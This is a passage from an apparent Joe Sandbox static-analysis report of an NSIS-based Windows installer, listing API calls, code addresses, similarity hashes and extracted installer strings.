                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                   Memory Dump Source
                                                                                   • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  APIs
                                                                                  • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                  • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                   Similarity
                                                                                   • API ID: Global$AllocFree
                                                                                   • API String ID: 3394109436-0
                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                   Similarity
                                                                                   • API ID: MessageSend
                                                                                   • API String ID: 3850602802-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                   Similarity
                                                                                   • API ID: File$AttributesCreate
                                                                                   • API String ID: 415043291-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                   Similarity
                                                                                   • API ID: AttributesFile
                                                                                   • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                   Similarity
                                                                                   • API ID: FileRead
                                                                                   • API String ID: 2738559852-0
                                                                                  APIs
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                  • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                   Similarity
                                                                                   • API ID: Char$Next$CreateDirectoryPrev
                                                                                   • API String ID: 4115351271-0
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                  • EmptyClipboard.USER32 ref: 00405411
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                  • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                  • CloseClipboard.USER32 ref: 0040546E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                                                  • API String ID: 2110491804-2409696222
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $ @$M$N
                                                                                  • API String ID: 1638840714-3479655940
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                  • String ID: 82D$@%F$@rD$A
                                                                                  • API String ID: 3347642858-1086125096
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                  • API String ID: 1916479912-1189179171
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                  • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                                  • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                                                  Strings
                                                                                  • \*.*, xrefs: 00406D03
                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                  Similarity
                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                  Strings
                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                  Similarity
                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                                                  • DestroyWindow.USER32 ref: 004054E6
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                  • EnableWindow.USER32(?,?), ref: 0040573C
                                                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                  • String ID: @rD
                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                  • String ID: @%F$N$open
                                                                                  APIs
                                                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                  • wsprintfA.USER32 ref: 00406B4D
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
